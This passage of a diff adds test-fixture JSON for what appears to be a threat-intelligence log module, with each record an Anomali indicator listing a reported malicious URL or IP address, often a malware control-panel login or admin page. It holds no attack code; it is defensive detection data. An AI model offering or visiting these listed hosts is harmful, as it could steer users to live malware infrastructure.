+ "threatintel.indicator.ip": "45.143.138.39", + "threatintel.indicator.type": "ipv4-addr" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 6501, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332316; iType: mal_url; State: active; Org: Sksa Technology Sdn Bhd; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-82" + ], + "threatintel.anomali.modified": "2020-01-22T02:59:41.193Z", + "threatintel.anomali.name": "mal_url: http://aglfreight.com.my/inc/js/jstree/biu/panel/admin.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://aglfreight.com.my/inc/js/jstree/biu/panel/admin.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T02:59:41.193Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "aglfreight.com.my", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://aglfreight.com.my/inc/js/jstree/biu/panel/admin.php", + "threatintel.indicator.url.path": "/inc/js/jstree/biu/panel/admin.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 7147, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332284; iType: mal_url; State: active; Org: Oltelecom Jsc; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-61" + ], + "threatintel.anomali.modified": "2020-01-22T02:59:41.228Z", + "threatintel.anomali.name": "mal_url: http://95.182.122.184/", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://95.182.122.184/']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T02:59:41.228Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "95.182.122.184", + "threatintel.indicator.url.original": "http://95.182.122.184/", + "threatintel.indicator.url.path": "/", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 7711, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332337; iType: mal_ip; State: active; Org: Namecheap; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-62" + ], + "threatintel.anomali.modified": "2020-01-22T02:59:51.313Z", + "threatintel.anomali.name": "mal_ip: 198.54.115.121", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[ipv4-addr:value = '198.54.115.121']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T02:59:51.313Z", + "threatintel.indicator.ip": "198.54.115.121", + "threatintel.indicator.type": "ipv4-addr" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 8259, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332324; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-38" + ], + "threatintel.anomali.modified": "2020-01-22T02:59:51.372Z", + "threatintel.anomali.name": "mal_ip: 192.185.119.172", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[ipv4-addr:value = '192.185.119.172']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T02:59:51.372Z", + "threatintel.indicator.ip": "192.185.119.172", + "threatintel.indicator.type": "ipv4-addr" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 8812, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332296; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-61" + ], + "threatintel.anomali.modified": "2020-01-22T02:59:51.442Z", + "threatintel.anomali.name": "mal_url: http://f0389246.xsph.ru/login", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://f0389246.xsph.ru/login']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T02:59:51.442Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "f0389246.xsph.ru", + "threatintel.indicator.url.original": "http://f0389246.xsph.ru/login", + "threatintel.indicator.url.path": "/login", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 9427, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332400; iType: mal_url; State: active; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-66" + ], + "threatintel.anomali.modified": "2020-01-22T03:00:01.563Z", + "threatintel.anomali.name": "mal_url: http://appareluea.com/server/cp.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://appareluea.com/server/cp.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T03:00:01.563Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "appareluea.com", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://appareluea.com/server/cp.php", + "threatintel.indicator.url.path": "/server/cp.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 9997, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332396; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-93" + ], + "threatintel.anomali.modified": "2020-01-22T03:00:03.138Z", + "threatintel.anomali.name": "mal_url: http://nkpotu.xyz/Kpot2/login.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://nkpotu.xyz/Kpot2/login.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T03:00:03.138Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "nkpotu.xyz", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://nkpotu.xyz/Kpot2/login.php", + "threatintel.indicator.url.path": "/Kpot2/login.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 10580, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332363; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-76" + ], + "threatintel.anomali.modified": "2020-01-22T03:00:03.396Z", + "threatintel.anomali.name": "mal_url: http://chol.cc/Work5/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://chol.cc/Work5/PvqDq929BSx_A_D_M1n_a.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T03:00:03.396Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "chol.cc", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://chol.cc/Work5/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.path": "/Work5/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 11189, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332320; iType: mal_url; State: active; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-87" + ], + "threatintel.anomali.modified": "2020-01-22T03:00:03.642Z", + "threatintel.anomali.name": "mal_url: http://mecharnise.ir/ca4/panel/admin.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://mecharnise.ir/ca4/panel/admin.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T03:00:03.642Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "mecharnise.ir", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://mecharnise.ir/ca4/panel/admin.php", + "threatintel.indicator.url.path": "/ca4/panel/admin.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 11769, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332367; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-76" + ], + "threatintel.anomali.modified": "2020-01-22T03:00:27.534Z", + "threatintel.anomali.name": "mal_url: http://chol.cc/Work4/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://chol.cc/Work4/PvqDq929BSx_A_D_M1n_a.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T03:00:27.534Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "chol.cc", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://chol.cc/Work4/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.path": "/Work4/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 12378, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332317; iType: mal_url; State: active; Org: SoftLayer Technologies; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-78" + ], + "threatintel.anomali.modified": "2020-01-22T03:00:27.591Z", + "threatintel.anomali.name": "mal_url: http://kironofer.com/webpanel/login.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://kironofer.com/webpanel/login.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T03:00:27.591Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "kironofer.com", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://kironofer.com/webpanel/login.php", + "threatintel.indicator.url.path": "/webpanel/login.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 12985, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332309; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-68" + ], + "threatintel.anomali.modified": "2020-01-22T03:00:45.787Z", + "threatintel.anomali.name": "mal_url: http://worldatdoor.in/panel2/Panel/five/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://worldatdoor.in/panel2/Panel/five/PvqDq929BSx_A_D_M1n_a.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T03:00:45.787Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "worldatdoor.in", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://worldatdoor.in/panel2/Panel/five/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.path": "/panel2/Panel/five/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 13633, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332286; iType: mal_url; State: active; Org: Garanntor-Hosting; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-91" + ], + "threatintel.anomali.modified": "2020-01-22T03:00:45.841Z", + "threatintel.anomali.name": "mal_url: http://smartlinktelecom.top/kings/panel/admin.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://smartlinktelecom.top/kings/panel/admin.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T03:00:45.841Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "smartlinktelecom.top", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://smartlinktelecom.top/kings/panel/admin.php", + "threatintel.indicator.url.path": "/kings/panel/admin.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 14255, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332339; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-64" + ], + "threatintel.anomali.modified": "2020-01-22T03:00:45.959Z", + "threatintel.anomali.name": "mal_url: http://carirero.net/login.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://carirero.net/login.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T03:00:45.959Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "carirero.net", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://carirero.net/login.php", + "threatintel.indicator.url.path": "/login.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 14830, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332319; iType: mal_ip; State: active; Org: SoftLayer Technologies; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-30" + ], + "threatintel.anomali.modified": "2020-01-22T03:00:46.025Z", + "threatintel.anomali.name": "mal_ip: 74.116.84.20", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[ipv4-addr:value = '74.116.84.20']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T03:00:46.025Z", + "threatintel.indicator.ip": "74.116.84.20", + "threatintel.indicator.type": "ipv4-addr" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 15387, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332305; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-43" + ], + "threatintel.anomali.modified": "2020-01-22T03:00:57.729Z", + "threatintel.anomali.name": "mal_url: http://tuu.nu/login", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://tuu.nu/login']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T03:00:57.729Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "tuu.nu", + "threatintel.indicator.url.original": "http://tuu.nu/login", + "threatintel.indicator.url.path": "/login", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 15942, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332346; iType: mal_url; State: active; Org: Ifx Networks Colombia; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-36" + ], + "threatintel.anomali.modified": "2020-01-22T03:01:02.696Z", + "threatintel.anomali.name": "mal_url: http://dulfix.com/cgi-bins/dulfix/gustav57/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://dulfix.com/cgi-bins/dulfix/gustav57/PvqDq929BSx_A_D_M1n_a.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T03:01:02.696Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "dulfix.com", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://dulfix.com/cgi-bins/dulfix/gustav57/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.path": "/cgi-bins/dulfix/gustav57/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 16606, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332323; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-65" + ], + "threatintel.anomali.modified": "2020-01-22T03:01:02.807Z", + "threatintel.anomali.name": "mal_url: http://deliciasdvally.com.pe/includes/gter/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://deliciasdvally.com.pe/includes/gter/PvqDq929BSx_A_D_M1n_a.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T03:01:02.807Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "deliciasdvally.com.pe", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://deliciasdvally.com.pe/includes/gter/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.path": "/includes/gter/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 17261, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332399; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-93" + ], + "threatintel.anomali.modified": "2020-01-22T03:01:24.810Z", + "threatintel.anomali.name": "mal_url: http://nkpotu.xyz/Kpot1/login.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://nkpotu.xyz/Kpot1/login.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T03:01:24.810Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "nkpotu.xyz", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://nkpotu.xyz/Kpot1/login.php", + "threatintel.indicator.url.path": "/Kpot1/login.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 17841, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332328; iType: mal_ip; State: active; Org: RUCloud; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-87" + ], + "threatintel.anomali.modified": "2020-01-22T03:01:41.158Z", + "threatintel.anomali.name": "mal_ip: 194.87.147.80", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[ipv4-addr:value = '194.87.147.80']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T03:01:41.158Z", + "threatintel.indicator.ip": "194.87.147.80", + "threatintel.indicator.type": "ipv4-addr" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 18385, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332377; iType: mal_url; State: active; Org: A100 ROW GmbH; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-85" + ], + "threatintel.anomali.modified": "2020-01-22T03:01:57.189Z", + "threatintel.anomali.name": "mal_url: http://35.158.92.3/panel/admin.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://35.158.92.3/panel/admin.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T03:01:57.189Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "35.158.92.3", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://35.158.92.3/panel/admin.php", + "threatintel.indicator.url.path": "/panel/admin.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 18973, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332101; iType: mal_ip; State: active; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-42" + ], + "threatintel.anomali.modified": "2020-01-22T03:01:57.279Z", + "threatintel.anomali.name": "mal_ip: 45.95.168.70", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[ipv4-addr:value = '45.95.168.70']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T03:01:57.279Z", + "threatintel.indicator.ip": "45.95.168.70", + "threatintel.indicator.type": "ipv4-addr" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 19501, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332357; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-76" + ], + "threatintel.anomali.modified": "2020-01-22T03:02:50.570Z", + "threatintel.anomali.name": "mal_url: http://chol.cc/Work7/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://chol.cc/Work7/PvqDq929BSx_A_D_M1n_a.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T03:02:50.570Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "chol.cc", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://chol.cc/Work7/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.path": "/Work7/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 20107, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332289; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-26" + ], + "threatintel.anomali.modified": "2020-01-22T03:02:52.496Z", + "threatintel.anomali.name": "mal_url: http://f0391600.xsph.ru/login", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://f0391600.xsph.ru/login']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T03:02:52.496Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "f0391600.xsph.ru", + "threatintel.indicator.url.original": "http://f0391600.xsph.ru/login", + "threatintel.indicator.url.path": "/login", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 20722, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332334; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-94" + ], + 